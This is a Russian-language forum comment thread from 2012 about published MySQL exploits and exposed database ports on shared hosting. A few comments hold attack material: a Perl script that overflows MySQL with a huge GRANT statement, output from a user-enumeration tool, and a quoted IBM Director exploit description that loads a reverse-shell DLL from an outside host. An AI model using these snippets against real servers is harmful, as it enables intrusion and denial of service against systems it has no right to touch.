1.4, Аноним (-), 00:08, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Работает, наверное :)
% ./mysql_userenum_pl.bin 192.168.255.3 english.dic
[*] HIT! -- USER EXISTS: !@192.168.255.3
| |
1.6, lemanyk (ok), 00:59, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]
| +4 +/– |
mysql настолько решето, что уже даже не смешно
#!/usr/bin/perl
use strict;
use DBI();
# Connect to the database.
my $dbh = DBI->connect("DBI:mysql:database=test;host=192.168.2.3;",
"user", "secret",
{'RaiseError' => 1});
$a ="A" x 100000;
my $sth = $dbh->prepare("grant file on $a.* to 'user'\@'%' identified by 'secret';");
$sth->execute();
# Disconnect from the database.
$dbh->disconnect();
| |
|
2.11, myhand (ok), 01:42, 03/12/2012 [^] [^^] [^^^] [ответить]
| –1 +/– |
> Ни один не работает, все пишут access denied, несмотря на то, что
> логин, пароль и база правильные.
"Ни один", блин... Небось ровно один и протестировал - см. #10.
| |
|
1.10, myhand (ok), 01:40, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
mysql_privilege_elevation.pl - работает только ежели пользователю грант FILE дать... // squeeze
| |
1.12, Михрютка (ok), 01:46, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
The following exploit will load the dll from
\\isowarez.de\\director\wootwoot.dll
the wootwoot.dll is a reverse shell that will send a shell back to the
attacker (the code has to be inside the dll initialization routine).
The IBM Director exploit works on versions 5.20.3 and before, but not
on 5.2.30 SP2 and above.
ну красава, чо. впрочем, если кто-то держит 4 года непатченый директор, да еще его в интернеты выставляет, я такому вазелин со склада не выдавал бы из принципа.
| |
1.17, Аноним (-), 09:01, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]
| +2 +/– |
> версиями пакетов с MySQL из состава Debian Lenny
^^^^^^^^^^^^
О, свежачком запахло ...
| |
|
2.26, myhand (ok), 11:30, 03/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
>> версиями пакетов с MySQL из состава Debian Lenny
> ^^^^^^^^^^^^
> О, свежачком запахло ...
Для не умеющих читать самостоятельно балбесов: ошибки критичны для 5.0-5.5. Так что достанется буквально всем. Не нравится Lenny - можете попробовать на Squeeze, там 5.1. Или Wheezy.
| |
|
3.28, Andrey Mitrofanov (?), 11:37, 03/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
> Для не умеющих читать
..."""to be honest I didn't have a look into these optimizations and protections, it's hard enough to exploit it without these restrictions applied. seclists.org/fulldisclosure/2012/Dec/21
| |
|
|
1.20, Аноним (-), 10:48, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Кто-то выставляет SQL сервер (любой) голой ... в сеть? Думал, таких умников уже нет.
| |
|
2.21, Аноним (-), 10:50, 03/12/2012 [^] [^^] [^^^] [ответить]
| –1 +/– |
> Кто-то выставляет SQL сервер (любой) голой ... в сеть? Думал, таких умников
> уже нет.
Любой нормальный оператор хостинга выставляет.
| |
|
3.23, Аноним (-), 11:09, 03/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
Сомнение. С localhost - да. Но сам слушатель разве выставлен наружу?
| |
|
4.24, Аноним (-), 11:19, 03/12/2012 [^] [^^] [^^^] [ответить]
| +1 +/– |
> Сомнение. С localhost - да. Но сам слушатель разве выставлен наружу?
Такое допустимо в локальной сети, если структура корпоративного приложения основана но толстых клиентах, а на сервере слушатель сидит на реальном IP адресе. У такой схемы, конечно, есть определенные преимущества.
Если слушатель выставлен в Интернет - это глупость великая. Обычно между SQL сервером и внешним миром находится сервер приложений (java, PHP еtс), и SQL сервер непосредственно из сети никаким образом невидим. Он должен слушать только localhost. Если администрирование через phpMyAdmin, то это ничего не меняет.
| |
4.25, Туаук (?), 11:21, 03/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
Проблема в том что хомячки хотят доступ со своей персоналочки.
| |
|
5.31, Аноним (-), 12:18, 03/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
> Проблема в том что хомячки хотят доступ со своей персоналочки.
Хотят. Но это обычно в локальной сети. Чтобы туда забраться с эксплойтами, нужен носитель или засланный казачок. Что усложняет задачу на порядок.
| |
|
6.39, Аноним (-), 14:52, 03/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
>> Проблема в том что хомячки хотят доступ со своей персоналочки.
> Хотят. Но это обычно в локальной сети. Чтобы туда забраться с эксплойтами,
> нужен носитель или засланный казачок. Что усложняет задачу на порядок.
Ошибаешься. Нельзя взломать только совесть - да и то лишь у некоторых. (С)
| |
|
|
|
|
2.27, myhand (ok), 11:34, 03/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
> Кто-то выставляет SQL сервер (любой) голой ... в сеть? Думал, таких умников
> уже нет.
Зачем в сеть? Любой массовый виртуальный хостинг дает доступы своим клиентам. Для эксплуатации - есть все, что нужно. Стать клиентом можно за суммы =< 1$.
| |
|
3.29, Andrey Mitrofanov (?), 11:38, 03/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
> Для эксплуатации - есть все, что нужно.
> Стать клиентом можно за суммы =< 1$.
Найти дырявый php с sql-инджектом -- бесц^Hплатно.
| |
|
|
5.43, myhand (ok), 18:19, 03/12/2012 [^] [^^] [^^^] [ответить]
| +1 +/– |
> Можно, но это не имеет отношения к сабжу.
Еще как имеет, вьюнош. Вам комикс нарисовать, чтобы наконец дошло?
| |
|
|
3.32, Аноним (-), 12:19, 03/12/2012 [^] [^^] [^^^] [ответить]
| +1 +/– |
>> Кто-то выставляет SQL сервер (любой) голой ... в сеть? Думал, таких умников
>> уже нет.
> Зачем в сеть? Любой массовый виртуальный хостинг дает доступы своим клиентам.
> Для эксплуатации - есть все, что нужно. Стать клиентом
> можно за суммы =< 1$.
Для определенности, что именно он дает? Дает белый IP адрес и сидящий на порту 3306 слушатель MySQL? Сильно сомневаюсь.
| |
|
4.36, angra (ok), 14:33, 03/12/2012 [^] [^^] [^^^] [ответить]
| –1 +/– |
Твое видение имеет очень далекое отношение к реальности, мускул открытый в мир вполне обычное явление для shared hosting. Но даже если случилось чудо и он закрыт для мира, то можно по-прежнему за копейки стать клиентом и получить к нему доступ.
| |
4.44, myhand (ok), 18:22, 03/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
> Для определенности, что именно он дает?
Дает базу (или несколько) и логин/пароль для доступа к ней. Это позволит любому клиенту хостинга пойграться с предложенными скриптами.
А посредством уязвимостей в ПО этого клиента, тех же SQL-инъекций - еще и неопределенно большой компании кулхацкеров.
| |
|
|
2.33, XoRe (ok), 13:02, 03/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
> Кто-то выставляет SQL сервер (любой) голой ... в сеть? Думал, таких умников
> уже нет.
Вы даже не представляете, сколько хостеров в рунете держат 3306 порт открытым наружу.
Включая самые крупные.
А ещё over 9000 хостеров планеты.
Это просто праздник для скрипткидисов.
Грабь, убивай, ломай чужие хоумпаги!
Короче, жесть.
| |
|
3.37, angra (ok), 14:35, 03/12/2012 [^] [^^] [^^^] [ответить]
| –1 +/– |
Даже если нет открытого в мир мускула, то есть phpmyadmin.
| |
|
|
1.34, Аноним (-), 13:48, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
> протестированы с последними версиями пакетов с MySQL из состава openSUSE, SUSE и Debian Lenny.
интересно зачем было тестировать дебьяновкий oldstable?
| |
|
2.35, тоже Аноним (ok), 14:07, 03/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
Затем, что эксплойты затрагивают не свежак, который вчера написан и еще нигде не применяется, а давно и успешно используемые в реальной жизни системы.
| |
|
3.45, myhand (ok), 18:27, 03/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
> Затем, что эксплойты затрагивают не свежак, который вчера написан и еще нигде
> не применяется, а давно и успешно используемые в реальной жизни системы.
Замечательно и "свежак" затрагивает. обрати внимание на версии MySQL в статье.
Lenny был помянут из-за того, что там тестировалась самая старая версия (5.0) из отобранных дистрибутивов.
[сообщение отредактировано модератором]
| |
|
4.48, тоже Аноним (ok), 08:41, 04/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
"Не только свежак", если угодно. Имелось в виду, что дыры в нестабильных версиях никого, кроме разработчиков, не волнуют. А вот в стабильных, да еще давно стабильных...
| |
|
|
2.50, Elhana (ok), 11:56, 04/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
У firstvds например если кто создал vds с openvz года три назад и не переезжал, то он так на etch и остался.
| |
|
1.42, anonymousY (ok), 16:11, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]
| +4 +/– |
Посмотрел эксплоиты, там либо "эксплуатируется" привилегия FILE, которая равносильно ADMIN на базу, либо PoC, не имеющие рабочей реализации из-за фильтрации ввода на соответствие UTF, которые к тому же уже зарепорчены, и в MariaDB исправлены.
Единственное интересное - DOS, но кого этим удивишь? При наличии аккаунта, базу раком поставить не сложно в любом случае.
| |
|
|
3.47, anonymous (??), 02:36, 04/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
Для танкистов:
эксплойты PoC, рабочих в природе нет, и как сделать непонятно. "Новость" и ломаного гроша не стоит.
| |
|
4.51, Аноним (-), 12:36, 04/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
> эксплойты PoC, рабочих в природе нет, и как сделать непонятно. "Новость" и ломаного гроша не стоит.
Для Windows эксплоиты рабочие, а для Linux кому нужно ума хватит довести до рабочего состояния.
| |
4.52, Аноним (-), 12:42, 04/12/2012 [^] [^^] [^^^] [ответить] | +/– | То, что опубликованы прототипы эксплоитов не отменяет наличие уязвимости и сущес... большой текст свёрнут, показать | |
|
5.53, anonymousY (ok), 14:46, 04/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
>То, что опубликованы прототипы эксплоитов не отменяет наличие уязвимости и существование работающих эксплоитов.
Наличие рабочих эксплоитов сомнительно, надо обмануть парсер utf. Теоретически возможно, но на практике почти нереально.
| |
|
4.55, XoRe (ok), 01:49, 05/12/2012 [^] [^^] [^^^] [ответить]
| +/– |
> Для танкистов:
> эксплойты PoC, рабочих в природе нет, и как сделать непонятно. "Новость" и
> ломаного гроша не стоит.
Ога.
До публикации уязвимости вы, наверное, считали, что и уязвимости нет.
В конце концов, неизвестный источник мог обнародовать _не_все_ дырки.
| |
|
5.56, demimurych (ok), 13:09, 05/12/2012 [^] [^^] [^^^] [ответить]
| +1 +/– |
Неизвестный источник слил никому ненужный мусор.
PoC слили потому что способа реализовать атаку так и не нашли. Отдали общественности - может найдется гений и придумает способ.
| |
|
|
|
|
|